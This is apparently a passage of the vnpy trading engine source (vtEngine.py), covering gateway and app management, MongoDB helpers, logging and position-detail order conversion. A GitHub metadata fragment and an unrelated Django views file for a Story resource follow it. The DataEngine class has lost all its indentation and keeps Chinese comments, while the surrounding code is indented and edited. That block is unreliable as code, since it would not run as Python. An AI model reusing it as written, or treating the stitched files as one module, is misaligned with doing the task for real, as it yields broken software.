        # Create the gateway instance
        self.gatewayDict[gatewayName] = gatewayModule.gatewayClass(self.eventEngine,
                                                                   gatewayName)
        # Configure gateway polling (query loop)
        if gatewayModule.gatewayQryEnabled:
            self.gatewayDict[gatewayName].setQryEnabled(gatewayModule.gatewayQryEnabled)
        # Save the gateway details
        d = {
            'gatewayName': gatewayModule.gatewayName,
            'gatewayDisplayName': gatewayModule.gatewayDisplayName,
            'gatewayType': gatewayModule.gatewayType
        }
        self.gatewayDetailList.append(d)
    #----------------------------------------------------------------------
    def addApp(self, appModule):
        """Add an upper-level application module."""
        appName = appModule.appName
        # Create the application engine instance
        self.appDict[appName] = appModule.appEngine(self, self.eventEngine)
        # Expose the app engine as an attribute of the main engine
        self.__dict__[appName] = self.appDict[appName]
        # Save the application details
        d = {
            'appName': appModule.appName,
            'appDisplayName': appModule.appDisplayName,
            'appWidget': appModule.appWidget,
            'appIco': appModule.appIco
        }
        self.appDetailList.append(d)
    #----------------------------------------------------------------------
    def getGateway(self, gatewayName):
        """Return the gateway with the given name, or None (with a log)."""
        if gatewayName in self.gatewayDict:
            return self.gatewayDict[gatewayName]
        else:
            self.writeLog(text.GATEWAY_NOT_EXIST.format(gateway=gatewayName))
            return None
    #----------------------------------------------------------------------
    def connect(self, gatewayName):
        """Connect the gateway with the given name."""
        gateway = self.getGateway(gatewayName)
        if gateway:
            gateway.connect()
        # Automatically connect to the database after the gateway connects
        self.dbConnect()
    #----------------------------------------------------------------------
    def subscribe(self, subscribeReq, gatewayName):
        """Subscribe to market data on a specific gateway."""
        gateway = self.getGateway(gatewayName)
        if gateway:
            gateway.subscribe(subscribeReq)
    #----------------------------------------------------------------------
    def sendOrder(self, orderReq, gatewayName):
        """Send an order through a specific gateway."""
        # If a risk engine exists and the risk check fails, do not send
        if self.rmEngine and not self.rmEngine.checkRisk(orderReq, gatewayName):
            return ''
        gateway = self.getGateway(gatewayName)
        if gateway:
            vtOrderID = gateway.sendOrder(orderReq)
            self.dataEngine.updateOrderReq(orderReq, vtOrderID)     # record the outgoing order request in the data engine
            return vtOrderID
        else:
            return ''
    #----------------------------------------------------------------------
    def cancelOrder(self, cancelOrderReq, gatewayName):
        """Cancel an order on a specific gateway."""
        gateway = self.getGateway(gatewayName)
        if gateway:
            gateway.cancelOrder(cancelOrderReq)
    #----------------------------------------------------------------------
    def qryAccount(self, gatewayName):
        """Query account data on a specific gateway."""
        gateway = self.getGateway(gatewayName)
        if gateway:
            gateway.qryAccount()
    #----------------------------------------------------------------------
    def qryPosition(self, gatewayName):
        """Query position data on a specific gateway."""
        gateway = self.getGateway(gatewayName)
        if gateway:
            gateway.qryPosition()
    #----------------------------------------------------------------------
    def exit(self):
        """Called before exiting the program to guarantee a clean shutdown."""
        # Safely close all gateways
        for gateway in self.gatewayDict.values():
            gateway.close()
        # Stop the event engine
        self.eventEngine.stop()
        # Stop the application engines
        for appEngine in self.appDict.values():
            appEngine.stop()
        # Persist the data engine's contract data to disk
        self.dataEngine.saveContracts()
    #----------------------------------------------------------------------
    def writeLog(self, content):
        """Convenience helper to emit a log event."""
        log = VtLogData()
        log.logContent = content
        log.gatewayName = 'MAIN_ENGINE'
        event = Event(type_=EVENT_LOG)
        event.dict_['data'] = log
        self.eventEngine.put(event)
    #----------------------------------------------------------------------
    def dbConnect(self):
        """Connect to the MongoDB database."""
        if not self.dbClient:
            # Read the MongoDB settings
            try:
                # Set the MongoDB operation timeout to 0.5 seconds
                self.dbClient = MongoClient(globalSetting['mongoHost'], globalSetting['mongoPort'], connectTimeoutMS=500)
                # Call server_info to check server status, guarding against a
                # faulty server where the connection did not really succeed
                self.dbClient.server_info()
                self.writeLog(text.DATABASE_CONNECTING_COMPLETED)
                # If database logging is enabled, register the log event handler
                if globalSetting['mongoLogging']:
                    self.eventEngine.register(EVENT_LOG, self.dbLogging)
            except ConnectionFailure:
                self.writeLog(text.DATABASE_CONNECTING_FAILED)
    #----------------------------------------------------------------------
    def dbInsert(self, dbName, collectionName, d):
        """Insert data into MongoDB; d is the document."""
        if self.dbClient:
            db = self.dbClient[dbName]
            collection = db[collectionName]
            collection.insert_one(d)
        else:
            self.writeLog(text.DATA_INSERT_FAILED)
    #----------------------------------------------------------------------
    def dbQuery(self, dbName, collectionName, d, sortKey='', sortDirection=ASCENDING):
        """Read data from MongoDB; d is the filter; returns the documents as a list."""
        if self.dbClient:
            db = self.dbClient[dbName]
            collection = db[collectionName]
            if sortKey:
                cursor = collection.find(d).sort(sortKey, sortDirection)    # sort the query results
            else:
                cursor = collection.find(d)
            if cursor:
                return list(cursor)
            else:
                return []
        else:
            self.writeLog(text.DATA_QUERY_FAILED)
            return []
    #----------------------------------------------------------------------
    def dbUpdate(self, dbName, collectionName, d, flt, upsert=False):
        """Update data in MongoDB; d is the document, flt the filter,
        upsert controls insertion when no match exists."""
        if self.dbClient:
            db = self.dbClient[dbName]
            collection = db[collectionName]
            collection.replace_one(flt, d, upsert)
        else:
            self.writeLog(text.DATA_UPDATE_FAILED)
    #----------------------------------------------------------------------
    def dbLogging(self, event):
        """Insert a log record into MongoDB."""
        log = event.dict_['data']
        d = {
            'content': log.logContent,
            'time': log.logTime,
            'gateway': log.gatewayName
        }
        self.dbInsert(LOG_DB_NAME, self.todayDate, d)
    #----------------------------------------------------------------------
    def getContract(self, vtSymbol):
        """Look up a contract."""
        return self.dataEngine.getContract(vtSymbol)
    #----------------------------------------------------------------------
    def getAllContracts(self):
        """Return all contracts (as a list)."""
        return self.dataEngine.getAllContracts()
    #----------------------------------------------------------------------
    def getOrder(self, vtOrderID):
        """Look up an order."""
        return self.dataEngine.getOrder(vtOrderID)
    #----------------------------------------------------------------------
    def getPositionDetail(self, vtSymbol):
        """Look up position detail."""
        return self.dataEngine.getPositionDetail(vtSymbol)
    #----------------------------------------------------------------------
    def getAllWorkingOrders(self):
        """Return all active (working) orders (as a list)."""
        return self.dataEngine.getAllWorkingOrders()
    #----------------------------------------------------------------------
    def getAllOrders(self):
        """Return all orders."""
        return self.dataEngine.getAllOrders()
    #----------------------------------------------------------------------
    def getAllTrades(self):
        """Return all trades."""
        return self.dataEngine.getAllTrades()
    #----------------------------------------------------------------------
    def getAllAccounts(self):
        """Return all accounts."""
        return self.dataEngine.getAllAccounts()
    #----------------------------------------------------------------------
    def getAllPositions(self):
        """Return all positions."""
        return self.dataEngine.getAllPositions()
    #----------------------------------------------------------------------
    def getAllPositionDetails(self):
        """Return all locally cached position details."""
        return self.dataEngine.getAllPositionDetails()
    #----------------------------------------------------------------------
    def getAllGatewayDetails(self):
        """Return details of every low-level gateway in the engine."""
        return self.gatewayDetailList
    #----------------------------------------------------------------------
    def getAllAppDetails(self):
        """Return details of every upper-level application in the engine."""
        return self.appDetailList
    #----------------------------------------------------------------------
    def getApp(self, appName):
        """Return the APP engine object by name."""
        return self.appDict[appName]
    #----------------------------------------------------------------------
    def initLogEngine(self):
        """Initialise the log engine."""
        if not globalSetting["logActive"]:
            return
        # Create the engine
        self.logEngine = LogEngine()
        # Set the log level
        levelDict = {
            "debug": LogEngine.LEVEL_DEBUG,
            "info": LogEngine.LEVEL_INFO,
            "warn": LogEngine.LEVEL_WARN,
            "error": LogEngine.LEVEL_ERROR,
            "critical": LogEngine.LEVEL_CRITICAL,
        }
        level = levelDict.get(globalSetting["logLevel"], LogEngine.LEVEL_CRITICAL)
        self.logEngine.setLogLevel(level)
        # Configure the outputs
        if globalSetting['logConsole']:
            self.logEngine.addConsoleHandler()
        if globalSetting['logFile']:
            self.logEngine.addFileHandler()
        # Register the event listener
        self.registerLogEvent(EVENT_LOG)
    #----------------------------------------------------------------------
    def registerLogEvent(self, eventType):
        """Register a log event listener."""
        if self.logEngine:
            self.eventEngine.register(eventType, self.logEngine.processLogEvent)
    #----------------------------------------------------------------------
    def convertOrderReq(self, req):
        """Convert an order request (position/offset rules)."""
        return self.dataEngine.convertOrderReq(req)
    #----------------------------------------------------------------------
    def getLog(self):
        """Return collected log records."""
        return self.dataEngine.getLog()
    #----------------------------------------------------------------------
    def getError(self):
        """Return collected error records."""
        return self.dataEngine.getError()
########################################################################
class DataEngine(object):
"""数据引擎"""
contractFileName = 'ContractData.vt'
contractFilePath = getTempPath(contractFileName)
FINISHED_STATUS = [STATUS_ALLTRADED, STATUS_REJECTED, STATUS_CANCELLED]
#----------------------------------------------------------------------
def __init__(self, eventEngine):
"""Constructor"""
self.eventEngine = eventEngine
# 保存数据的字典和列表
self.contractDict = {}
self.orderDict = {}
self.workingOrderDict = {} # 可撤销委托
self.tradeDict = {}
self.accountDict = {}
self.positionDict= {}
self.logList = []
self.errorList = []
# 持仓细节相关
self.detailDict = {} # vtSymbol:PositionDetail
self.tdPenaltyList = globalSetting['tdPenalty'] # 平今手续费惩罚的产品代码列表
# 读取保存在硬盘的合约数据
self.loadContracts()
# 注册事件监听
self.registerEvent()
#----------------------------------------------------------------------
def registerEvent(self):
"""注册事件监听"""
self.eventEngine.register(EVENT_CONTRACT, self.processContractEvent)
self.eventEngine.register(EVENT_ORDER, self.processOrderEvent)
self.eventEngine.register(EVENT_TRADE, self.processTradeEvent)
self.eventEngine.register(EVENT_POSITION, self.processPositionEvent)
self.eventEngine.register(EVENT_ACCOUNT, self.processAccountEvent)
self.eventEngine.register(EVENT_LOG, self.processLogEvent)
self.eventEngine.register(EVENT_ERROR, self.processErrorEvent)
#----------------------------------------------------------------------
def processContractEvent(self, event):
"""处理合约事件"""
contract = event.dict_['data']
self.contractDict[contract.vtSymbol] = contract
self.contractDict[contract.symbol] = contract # 使用常规代码(不包括交易所)可能导致重复
#----------------------------------------------------------------------
def processOrderEvent(self, event):
"""处理委托事件"""
order = event.dict_['data']
self.orderDict[order.vtOrderID] = order
# 如果订单的状态是全部成交或者撤销,则需要从workingOrderDict中移除
if order.status in self.FINISHED_STATUS:
if order.vtOrderID in self.workingOrderDict:
del self.workingOrderDict[order.vtOrderID]
# 否则则更新字典中的数据
else:
self.workingOrderDict[order.vtOrderID] = order
# 更新到持仓细节中
detail = self.getPositionDetail(order.vtSymbol)
detail.updateOrder(order)
#----------------------------------------------------------------------
def processTradeEvent(self, event):
"""处理成交事件"""
trade = event.dict_['data']
self.tradeDict[trade.vtTradeID] = trade
# 更新到持仓细节中
detail = self.getPositionDetail(trade.vtSymbol)
detail.updateTrade(trade)
#----------------------------------------------------------------------
def processPositionEvent(self, event):
"""处理持仓事件"""
pos = event.dict_['data']
self.positionDict[pos.vtPositionName] = pos
# 更新到持仓细节中
detail = self.getPositionDetail(pos.vtSymbol)
detail.updatePosition(pos)
#----------------------------------------------------------------------
def processAccountEvent(self, event):
"""处理账户事件"""
account = event.dict_['data']
self.accountDict[account.vtAccountID] = account
#----------------------------------------------------------------------
def processLogEvent(self, event):
"""处理日志事件"""
log = event.dict_['data']
self.logList.append(log)
#----------------------------------------------------------------------
def processErrorEvent(self, event):
"""处理错误事件"""
error = event.dict_['data']
self.errorList.append(error)
#----------------------------------------------------------------------
def getContract(self, vtSymbol):
"""查询合约对象"""
try:
return self.contractDict[vtSymbol]
except KeyError:
return None
#----------------------------------------------------------------------
def getAllContracts(self):
"""查询所有合约对象(返回列表)"""
return self.contractDict.values()
#----------------------------------------------------------------------
def saveContracts(self):
"""保存所有合约对象到硬盘"""
f = shelve.open(self.contractFilePath)
f['data'] = self.contractDict
f.close()
#----------------------------------------------------------------------
def loadContracts(self):
"""从硬盘读取合约对象"""
f = shelve.open(self.contractFilePath)
if 'data' in f:
d = f['data']
for key, value in d.items():
self.contractDict[key] = value
f.close()
#----------------------------------------------------------------------
def getOrder(self, vtOrderID):
"""查询委托"""
try:
return self.orderDict[vtOrderID]
except KeyError:
return None
#----------------------------------------------------------------------
def getAllWorkingOrders(self):
"""查询所有活动委托(返回列表)"""
return self.workingOrderDict.values()
#----------------------------------------------------------------------
def getAllOrders(self):
"""获取所有委托"""
return self.orderDict.values()
#----------------------------------------------------------------------
def getAllTrades(self):
"""获取所有成交"""
return self.tradeDict.values()
#----------------------------------------------------------------------
def getAllPositions(self):
"""获取所有持仓"""
return self.positionDict.values()
#----------------------------------------------------------------------
def getAllAccounts(self):
"""获取所有资金"""
return self.accountDict.values()
#----------------------------------------------------------------------
def getPositionDetail(self, vtSymbol):
"""查询持仓细节"""
if vtSymbol in self.detailDict:
detail = self.detailDict[vtSymbol]
else:
contract = self.getContract(vtSymbol)
detail = PositionDetail(vtSymbol, contract)
self.detailDict[vtSymbol] = detail
# 设置持仓细节的委托转换模式
contract = self.getContract(vtSymbol)
if contract:
detail.exchange = contract.exchange
# 上期所合约
if contract.exchange == EXCHANGE_SHFE:
detail.mode = detail.MODE_SHFE
# 检查是否有平今惩罚
for productID in self.tdPenaltyList:
if str(productID) in contract.symbol:
detail.mode = detail.MODE_TDPENALTY
return detail
#----------------------------------------------------------------------
    def getAllPositionDetails(self):
        """Return all locally cached PositionDetail objects."""
        return self.detailDict.values()
#----------------------------------------------------------------------
def updateOrderReq(self, req, vtOrderID):
"""委托请求更新"""
vtSymbol = req.vtSymbol
detail = self.getPositionDetail(vtSymbol)
detail.updateOrderReq(req, vtOrderID)
#----------------------------------------------------------------------
def convertOrderReq(self, req):
"""根据规则转换委托请求"""
detail = self.detailDict.get(req.vtSymbol, None)
if not detail:
return [req]
else:
return detail.convertOrderReq(req)
#----------------------------------------------------------------------
    def getLog(self):
        """Return the accumulated log events."""
        return self.logList
#----------------------------------------------------------------------
    def getError(self):
        """Return the accumulated error events."""
        return self.errorList
########################################################################
class LogEngine(object):
    """Logging engine: thin wrapper around the stdlib ``logging`` root logger.

    Provides optional console and file handlers, per-level output methods,
    and an event-engine hook (:meth:`processLogEvent`).
    """

    # singleton (Python 2 metaclass hook; VtSingleton is defined elsewhere)
    __metaclass__ = VtSingleton

    # log levels, aliased from the stdlib logging module
    LEVEL_DEBUG = logging.DEBUG
    LEVEL_INFO = logging.INFO
    LEVEL_WARN = logging.WARN
    LEVEL_ERROR = logging.ERROR
    LEVEL_CRITICAL = logging.CRITICAL

    #----------------------------------------------------------------------
    def __init__(self):
        """Constructor"""
        self.logger = logging.getLogger()
        self.formatter = logging.Formatter('%(asctime)s %(levelname)s: %(message)s')
        self.level = self.LEVEL_CRITICAL

        # handlers are created lazily by the add*Handler methods
        self.consoleHandler = None
        self.fileHandler = None

        # add a NullHandler to suppress "no handlers could be found" warnings
        nullHandler = logging.NullHandler()
        self.logger.addHandler(nullHandler)

        # map each log level to the corresponding output method
        self.levelFunctionDict = {
            self.LEVEL_DEBUG: self.debug,
            self.LEVEL_INFO: self.info,
            self.LEVEL_WARN: self.warn,
            self.LEVEL_ERROR: self.error,
            self.LEVEL_CRITICAL: self.critical,
        }

    #----------------------------------------------------------------------
    def setLogLevel(self, level):
        """Set the log level on both the underlying logger and this engine."""
        self.logger.setLevel(level)
        self.level = level

    #----------------------------------------------------------------------
    def addConsoleHandler(self):
        """Attach a console (stream) handler; no-op if one already exists."""
        if not self.consoleHandler:
            self.consoleHandler = logging.StreamHandler()
            self.consoleHandler.setLevel(self.level)
            self.consoleHandler.setFormatter(self.formatter)
            self.logger.addHandler(self.consoleHandler)

    #----------------------------------------------------------------------
    def addFileHandler(self, filename=''):
        """Attach a file handler; no-op if one already exists.

        Defaults to ``vt_YYYYMMDD.log`` in the temp path when no filename
        is given.
        """
        if not self.fileHandler:
            if not filename:
                filename = 'vt_' + datetime.now().strftime('%Y%m%d') + '.log'
            filepath = getTempPath(filename)
            self.fileHandler = logging.FileHandler(filepath)
            self.fileHandler.setLevel(self.level)
            self.fileHandler.setFormatter(self.formatter)
            self.logger.addHandler(self.fileHandler)

    #----------------------------------------------------------------------
    def debug(self, msg):
        """Development-time output."""
        self.logger.debug(msg)

    #----------------------------------------------------------------------
    def info(self, msg):
        """Normal informational output."""
        self.logger.info(msg)

    #----------------------------------------------------------------------
    def warn(self, msg):
        """Warning output."""
        self.logger.warn(msg)

    #----------------------------------------------------------------------
    def error(self, msg):
        """Error output."""
        self.logger.error(msg)

    #----------------------------------------------------------------------
    def exception(self, msg):
        """Error output plus the current exception traceback."""
        self.logger.exception(msg)

    #----------------------------------------------------------------------
    def critical(self, msg):
        """Severe errors that affect program operation."""
        self.logger.critical(msg)

    #----------------------------------------------------------------------
    def processLogEvent(self, event):
        """Handle a log event from the event engine."""
        log = event.dict_['data']
        function = self.levelFunctionDict[log.logLevel]     # dispatch on the event's level
        msg = '\t'.join([log.gatewayName, log.logContent])
        function(msg)
########################################################################
class PositionDetail(object):
    """Locally maintained position detail for a single symbol.

    Tracks today/yesterday long and short volumes, frozen volumes implied by
    working orders, average prices and PnL, and converts close requests
    according to exchange rules (SHFE close-today/close-yesterday split, or
    the close-today penalty mode).

    Fixes vs. the original:
      * ``__init__`` no longer re-assigns ``self.exchange = EMPTY_STRING``
        after copying the exchange from the contract (that reset clobbered
        the contract's value);
      * string-constant comparisons use ``==`` instead of ``is`` (identity
        only worked by interning accident);
      * ``output()`` uses parenthesised single-argument ``print`` calls,
        valid on both Python 2 and 3 with identical output.
    """
    WORKING_STATUS = [STATUS_UNKNOWN, STATUS_NOTTRADED, STATUS_PARTTRADED]

    MODE_NORMAL = 'normal'          # regular mode: requests pass through
    MODE_SHFE = 'shfe'              # SHFE: close today / yesterday separately
    MODE_TDPENALTY = 'tdpenalty'    # product penalised for closing today's position

    #----------------------------------------------------------------------
    def __init__(self, vtSymbol, contract=None):
        """Constructor"""
        self.vtSymbol = vtSymbol
        self.symbol = EMPTY_STRING
        self.exchange = EMPTY_STRING
        self.name = EMPTY_UNICODE
        self.size = 1

        if contract:
            self.symbol = contract.symbol
            self.exchange = contract.exchange
            self.name = contract.name
            self.size = contract.size

        self.longPos = EMPTY_INT
        self.longYd = EMPTY_INT
        self.longTd = EMPTY_INT
        self.longPosFrozen = EMPTY_INT
        self.longYdFrozen = EMPTY_INT
        self.longTdFrozen = EMPTY_INT
        self.longPnl = EMPTY_FLOAT
        self.longPrice = EMPTY_FLOAT

        self.shortPos = EMPTY_INT
        self.shortYd = EMPTY_INT
        self.shortTd = EMPTY_INT
        self.shortPosFrozen = EMPTY_INT
        self.shortYdFrozen = EMPTY_INT
        self.shortTdFrozen = EMPTY_INT
        self.shortPnl = EMPTY_FLOAT
        self.shortPrice = EMPTY_FLOAT

        self.lastPrice = EMPTY_FLOAT

        self.mode = self.MODE_NORMAL
        # BUGFIX: the original reset self.exchange to EMPTY_STRING here,
        # discarding the exchange copied from the contract above.
        self.workingOrderDict = {}

    #----------------------------------------------------------------------
    def updateTrade(self, trade):
        """Update today/yesterday volumes from a trade, then refresh the
        price, position and PnL aggregates."""
        # long trade
        if trade.direction == DIRECTION_LONG:
            # open
            if trade.offset == OFFSET_OPEN:
                self.longTd += trade.volume
            # close today
            elif trade.offset == OFFSET_CLOSETODAY:
                self.shortTd -= trade.volume
            # close yesterday
            elif trade.offset == OFFSET_CLOSEYESTERDAY:
                self.shortYd -= trade.volume
            # generic close
            elif trade.offset == OFFSET_CLOSE:
                # on SHFE a generic close is equivalent to closing yesterday
                if self.exchange == EXCHANGE_SHFE:
                    self.shortYd -= trade.volume
                # elsewhere close today's volume first, overflow into yesterday
                else:
                    self.shortTd -= trade.volume
                    if self.shortTd < 0:
                        self.shortYd += self.shortTd
                        self.shortTd = 0
        # short trade
        elif trade.direction == DIRECTION_SHORT:
            # open
            if trade.offset == OFFSET_OPEN:
                self.shortTd += trade.volume
            # close today
            elif trade.offset == OFFSET_CLOSETODAY:
                self.longTd -= trade.volume
            # close yesterday
            elif trade.offset == OFFSET_CLOSEYESTERDAY:
                self.longYd -= trade.volume
            # generic close
            elif trade.offset == OFFSET_CLOSE:
                # on SHFE a generic close is equivalent to closing yesterday
                if self.exchange == EXCHANGE_SHFE:
                    self.longYd -= trade.volume
                # elsewhere close today's volume first, overflow into yesterday
                else:
                    self.longTd -= trade.volume
                    if self.longTd < 0:
                        self.longYd += self.longTd
                        self.longTd = 0

        # refresh the aggregates
        self.calculatePrice(trade)
        self.calculatePosition()
        self.calculatePnl()

    #----------------------------------------------------------------------
    def updateOrder(self, order):
        """Track working orders and recompute frozen volumes."""
        # cache active orders
        if order.status in self.WORKING_STATUS:
            self.workingOrderDict[order.vtOrderID] = order
        # drop finished orders from the cache
        else:
            if order.vtOrderID in self.workingOrderDict:
                del self.workingOrderDict[order.vtOrderID]

        # recompute frozen volumes
        self.calculateFrozen()

    #----------------------------------------------------------------------
    def updatePosition(self, pos):
        """Overwrite cached volumes and prices from an exchange position report."""
        if pos.direction == DIRECTION_LONG:
            self.longPos = pos.position
            self.longYd = pos.ydPosition
            self.longTd = self.longPos - self.longYd
            self.longPnl = pos.positionProfit
            self.longPrice = pos.price
        elif pos.direction == DIRECTION_SHORT:
            self.shortPos = pos.position
            self.shortYd = pos.ydPosition
            self.shortTd = self.shortPos - self.shortYd
            self.shortPnl = pos.positionProfit
            self.shortPrice = pos.price

    #----------------------------------------------------------------------
    def updateOrderReq(self, req, vtOrderID):
        """Register a just-sent order request as a working order."""
        vtSymbol = req.vtSymbol

        # build an order object from the request
        order = VtOrderData()
        order.vtSymbol = vtSymbol
        order.symbol = req.symbol
        order.exchange = req.exchange
        order.offset = req.offset
        order.direction = req.direction
        order.totalVolume = req.volume
        order.status = STATUS_UNKNOWN

        # cache it as a working order
        self.workingOrderDict[vtOrderID] = order

        # recompute frozen volumes
        self.calculateFrozen()

    #----------------------------------------------------------------------
    def updateTick(self, tick):
        """Refresh the last price and the PnL from a market tick."""
        self.lastPrice = tick.lastPrice
        self.calculatePnl()

    #----------------------------------------------------------------------
    def calculatePnl(self):
        """Recompute open PnL on both sides from the last price."""
        self.longPnl = self.longPos * (self.lastPrice - self.longPrice) * self.size
        self.shortPnl = self.shortPos * (self.shortPrice - self.lastPrice) * self.size

    #----------------------------------------------------------------------
    def calculatePrice(self, trade):
        """Recompute average holding price; only opening trades move it."""
        if trade.offset == OFFSET_OPEN:
            if trade.direction == DIRECTION_LONG:
                cost = self.longPrice * self.longPos
                cost += trade.volume * trade.price
                newPos = self.longPos + trade.volume
                if newPos:
                    self.longPrice = cost / newPos
                else:
                    self.longPrice = 0
            else:
                cost = self.shortPrice * self.shortPos
                cost += trade.volume * trade.price
                newPos = self.shortPos + trade.volume
                if newPos:
                    self.shortPrice = cost / newPos
                else:
                    self.shortPrice = 0

    #----------------------------------------------------------------------
    def calculatePosition(self):
        """Total position = today + yesterday, per side."""
        self.longPos = self.longTd + self.longYd
        self.shortPos = self.shortTd + self.shortYd

    #----------------------------------------------------------------------
    def calculateFrozen(self):
        """Recompute frozen volumes from the unfilled part of working orders."""
        # reset all frozen counters
        self.longPosFrozen = EMPTY_INT
        self.longYdFrozen = EMPTY_INT
        self.longTdFrozen = EMPTY_INT
        self.shortPosFrozen = EMPTY_INT
        self.shortYdFrozen = EMPTY_INT
        self.shortTdFrozen = EMPTY_INT

        # tally over working orders
        for order in self.workingOrderDict.values():
            # remaining (unfilled) volume is what stays frozen
            frozenVolume = order.totalVolume - order.tradedVolume

            # a long close order freezes short volume
            if order.direction == DIRECTION_LONG:
                # close today
                if order.offset == OFFSET_CLOSETODAY:
                    self.shortTdFrozen += frozenVolume
                # close yesterday
                elif order.offset == OFFSET_CLOSEYESTERDAY:
                    self.shortYdFrozen += frozenVolume
                # generic close: freeze today first, overflow into yesterday
                elif order.offset == OFFSET_CLOSE:
                    self.shortTdFrozen += frozenVolume
                    if self.shortTdFrozen > self.shortTd:
                        self.shortYdFrozen += (self.shortTdFrozen - self.shortTd)
                        self.shortTdFrozen = self.shortTd
            # a short close order freezes long volume
            elif order.direction == DIRECTION_SHORT:
                # close today
                if order.offset == OFFSET_CLOSETODAY:
                    self.longTdFrozen += frozenVolume
                # close yesterday
                elif order.offset == OFFSET_CLOSEYESTERDAY:
                    self.longYdFrozen += frozenVolume
                # generic close: freeze today first, overflow into yesterday
                elif order.offset == OFFSET_CLOSE:
                    self.longTdFrozen += frozenVolume
                    if self.longTdFrozen > self.longTd:
                        self.longYdFrozen += (self.longTdFrozen - self.longTd)
                        self.longTdFrozen = self.longTd

        # totals per side
        self.longPosFrozen = self.longYdFrozen + self.longTdFrozen
        self.shortPosFrozen = self.shortYdFrozen + self.shortTdFrozen

    #----------------------------------------------------------------------
    def output(self):
        """Print a human-readable summary of this detail (debugging aid)."""
        print('%s %s' % (self.vtSymbol, '-' * 30))
        print('long, total:%s, td:%s, yd:%s' % (self.longPos, self.longTd, self.longYd))
        print('long frozen, total:%s, td:%s, yd:%s' % (self.longPosFrozen, self.longTdFrozen, self.longYdFrozen))
        print('short, total:%s, td:%s, yd:%s' % (self.shortPos, self.shortTd, self.shortYd))
        print('short frozen, total:%s, td:%s, yd:%s' % (self.shortPosFrozen, self.shortTdFrozen, self.shortYdFrozen))

    #----------------------------------------------------------------------
    def convertOrderReq(self, req):
        """Convert an order request according to the conversion mode.

        Returns a list of one or more requests, or an empty list when the
        requested close volume exceeds the available position.
        """
        # normal mode: pass through unchanged
        if self.mode == self.MODE_NORMAL:
            return [req]

        # SHFE mode: split into close-today / close-yesterday, today first
        elif self.mode == self.MODE_SHFE:
            # opening needs no conversion
            if req.offset == OFFSET_OPEN:
                return [req]

            # a long request closes short volume
            if req.direction == DIRECTION_LONG:
                posAvailable = self.shortPos - self.shortPosFrozen
                tdAvailable = self.shortTd - self.shortTdFrozen
                ydAvailable = self.shortYd - self.shortYdFrozen
            # a short request closes long volume
            else:
                posAvailable = self.longPos - self.longPosFrozen
                tdAvailable = self.longTd - self.longTdFrozen
                ydAvailable = self.longYd - self.longYdFrozen

            # exceeds the total available: reject with an empty list
            if req.volume > posAvailable:
                return []
            # fits in today's available volume: close today only
            elif req.volume <= tdAvailable:
                req.offset = OFFSET_CLOSETODAY
                return [req]
            # otherwise close today's available first, then yesterday's
            else:
                l = []
                if tdAvailable > 0:
                    reqTd = copy(req)
                    reqTd.offset = OFFSET_CLOSETODAY
                    reqTd.volume = tdAvailable
                    l.append(reqTd)
                reqYd = copy(req)
                reqYd.offset = OFFSET_CLOSEYESTERDAY
                reqYd.volume = req.volume - tdAvailable
                l.append(reqYd)
                return l

        # close-today-penalty mode: close yesterday when there is no today
        # position, otherwise lock (open in the opposite direction)
        elif self.mode == self.MODE_TDPENALTY:
            # a long request works against the short side
            if req.direction == DIRECTION_LONG:
                td = self.shortTd
                ydAvailable = self.shortYd - self.shortYdFrozen
            # a short request works against the long side
            else:
                td = self.longTd
                ydAvailable = self.longYd - self.longYdFrozen

            # the same logic is applied to open and close requests alike:
            # with a today position only opening (locking) is allowed
            if td:
                req.offset = OFFSET_OPEN
                return [req]
            # close volume fits in yesterday's available volume
            elif req.volume <= ydAvailable:
                if self.exchange == EXCHANGE_SHFE:
                    req.offset = OFFSET_CLOSEYESTERDAY
                else:
                    req.offset = OFFSET_CLOSE
                return [req]
            # otherwise close what is available, then open the remainder
            else:
                l = []
                if ydAvailable > 0:
                    reqClose = copy(req)
                    if self.exchange == EXCHANGE_SHFE:
                        reqClose.offset = OFFSET_CLOSEYESTERDAY
                    else:
                        reqClose.offset = OFFSET_CLOSE
                    reqClose.volume = ydAvailable
                    l.append(reqClose)
                reqOpen = copy(req)
                reqOpen.offset = OFFSET_OPEN
                reqOpen.volume = req.volume - ydAvailable
                l.append(reqOpen)
                return l

        # any other mode: return empty
        return []
"content_hash": "f18e57b861a645f34d5670e514562197",
"timestamp": "",
"source": "github",
"line_count": 1069,
"max_line_length": 123,
"avg_line_length": 35.43966323666979,
"alnum_prop": 0.44104526857595355,
"repo_name": "wisfern/vnpy",
"id": "86168da35eca739d9e96d7f4a0a3c3b6b54fef83",
"size": "40798",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "vnpy/trader/vtEngine.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "341"
},
{
"name": "C",
"bytes": "3151559"
},
{
"name": "C++",
"bytes": "8866606"
},
{
"name": "CMake",
"bytes": "44564"
},
{
"name": "HTML",
"bytes": "807"
},
{
"name": "Makefile",
"bytes": "99693"
},
{
"name": "Objective-C",
"bytes": "22505"
},
{
"name": "PHP",
"bytes": "4107"
},
{
"name": "Python",
"bytes": "5367161"
},
{
"name": "Shell",
"bytes": "3722"
}
],
"symlink_target": ""
} |
from apps.base.views import BaseView
from contracts.story import STORY_ID
from apps.base.views import _base_request
from logics.story.logic import StoryServiceAgent
from apps.story.mappers import (GetStoryRequestSchema, GetStoryResponseSchema,
DetailStoryRequestSchema, DetailStoryResponseSchema,
PostStoryRequestSchema, PostStoryResponseSchema,
PutStoryRequestSchema, PutStoryResponseSchema,
DeleteStoryRequestSchema, DeleteStoryResponseSchema)
class StorysView(BaseView):
    """Collection endpoint for Story resources: list (paginated) and create."""

    def get(self, request):
        """Return a paginated list of stories."""
        return _base_request(request=request,
                             request_schema=GetStoryRequestSchema(),
                             response_schema=GetStoryResponseSchema(),
                             method=StoryServiceAgent.get_story,
                             is_paging=True)

    def post(self, request):
        """Create a new story from the request payload."""
        return _base_request(request=request,
                             request_schema=PostStoryRequestSchema(),
                             response_schema=PostStoryResponseSchema(),
                             method=StoryServiceAgent.post_story)
class StoryView(BaseView):
    """Detail endpoint for a single Story, addressed by ``code``."""

    def get(self, request, code):
        """Return the story identified by ``code``."""
        return _base_request(request=request,
                             request_schema=DetailStoryRequestSchema(),
                             response_schema=DetailStoryResponseSchema(),
                             method=StoryServiceAgent.detail_story,
                             code=code,
                             code_name=STORY_ID)

    def put(self, request, code):
        """Update the story identified by ``code``."""
        return _base_request(request=request,
                             request_schema=PutStoryRequestSchema(),
                             response_schema=PutStoryResponseSchema(),
                             method=StoryServiceAgent.put_story,
                             code=code,
                             code_name=STORY_ID)

